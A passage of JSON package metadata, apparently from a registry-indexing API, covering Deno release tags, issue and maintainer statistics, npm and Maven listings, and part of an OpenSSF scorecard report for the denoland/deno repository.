:"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-08-28T15:50:13.882Z","dependent_packages_count":0,"downloads":38356,"downloads_period":"last-month","dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":25.354594294144324,"dependent_packages_count":36.69686831981711,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":31.025731306980717},"purl":"pkg:npm/%40deno/darwin-arm64","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/@deno/darwin-arm64","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/npm/@deno/darwin-arm64","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/@deno/darwin-arm64/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-28T02:34:50.351Z","issues_count":6619,"pull_requests_count":9639,"avg_time_to_close_issue":17209143.875658587,"avg_time_to_close_pull_request":1533351.1008099688,"issues_closed_count":3794,"pull_requests_closed_count":8024,"pull_request_authors_count":580,"issue_authors_count":2470,"avg_comments_per_issue":2.509442513974921,"avg_comments_per_pull_request":0.719680464778504,"merged_pull_requests_count":7006,"bot_issues_count":0,"bot_pull_requests_count":48,"past_year_issues_count":663,"past_year_pull_requests_count":1197,"past_year_avg_time_to_close_issue":1426984.6098654708,"past_year_avg_time_to_close_pull_request":1334468.010687023,"past_year_issues_closed_count":223,"past_year_pull_requests_closed_count":655,"past_year_pull_request_authors_count":184,"past_year_issue_authors_count":365,"past_year_avg_comments_per_issue":1.2428355957767723,"past_year_avg_comments_per_pull_request":1.1161236424394319,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":14,"past_year_merged_pull_requests_count":483,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1795,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1732,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":674,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":290,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":283,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":269,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":150,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"leandrohstein","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/leandrohstein"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":391,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":186,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"littledivy","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"crowlKats","count":33,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"dsherret","count":29,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"devsnek","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"denobot","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"ry","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@deno%2Fdarwin-arm64/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@deno%2Fdarwin-arm64/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@deno%2Fdarwin-arm64/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@deno%2Fdarwin-arm64/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@deno%2Fdarwin-arm64/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@deno%2Fdarwin-arm64/codemeta","maintainers":[{"uuid":"ry","login":"ry","name":null,"email":"ry@tinyclouds.org","url":null,"packages_count":44,"html_url":"https://www.npmjs.com/~ry","role":null,"created_at":"2024-12-12T22:08:47.407Z","updated_at":"2024-12-12T22:08:47.407Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/ry/packages"},{"uuid":"divy-work","login":"divy-work","name":null,"email":"dj.srivastava23@gmail.com","url":null,"packages_count":45,"html_url":"https://www.npmjs.com/~divy-work","role":null,"created_at":"2024-12-12T22:08:47.641Z","updated_at":"2024-12-12T22:08:47.641Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/divy-work/packages"},{"uuid":"denobot","login":"denobot","name":null,"email":"denobot@deno.com","url":null,"packages_count":28,"html_url":"https://www.npmjs.com/~denobot","role":null,"created_at":"2024-12-12T22:08:47.682Z","updated_at":"2024-12-12T22:08:47.682Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/denobot/packages"},{"uuid":"bartlomieju","login":"bartlomieju","name":null,"email":"biwanczuk@gmail.com","url":null,"packages_count":26,"html_url":"https://www.npmjs.com/~bartlomieju","role":null,"created_at":"2026-03-27T13:02:40.507Z","updated_at":"2026-03-27T13:02:40.507Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/bartlomieju/packages"}],"registry":{"name":"npmjs.org","url":"https://registry.npmjs.org","ecosystem":"npm","default":true,"packages_count":5836603,"maintainers_count":1249644,"namespaces_count":427708,"keywords_count":891347,"github":"npm","metadata":{"funded_packages_count":192785,"rate_limit":2},"icon_url":"https://github.com/npm.png","created_at":"2022-04-04T15:19:23.081Z","updated_at":"2026-09-04T05:03:39.333Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/namespaces"}},{"id":12401428,"name":"org.mvnpm.at.deno:linux-x64-glibc","ecosystem":"maven","description":"linux-x64-glibc distribution of Deno","homepage":"https://deno.land","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":"org.mvnpm.at.deno","versions_count":18,"first_release_published_at":"2025-10-20T11:20:25.000Z","latest_release_published_at":"2026-08-30T02:06:30.000Z","latest_release_number":"2.9.6","last_synced_at":"2026-09-07T23:21:41.808Z","created_at":"2025-10-20T11:32:04.513Z","updated_at":"2026-09-07T23:21:41.808Z","registry_url":"https://central.sonatype.com/artifact/org.mvnpm.at.deno/linux-x64-glibc/","install_command":null,"documentation_url":"https://appdoc.app/artifact/org.mvnpm.at.deno/linux-x64-glibc/","metadata":{"repositories":["https://repo.maven.apache.org/maven2"]},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-08-22T12:52:12.000Z","size":247311,"stargazers_count":108275,"open_issues_count":1528,"forks_count":6351,"subscribers_count":1426,"default_branch":"main","last_synced_at":"2026-08-22T15:40:08.889Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-08-22T14:38:59.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 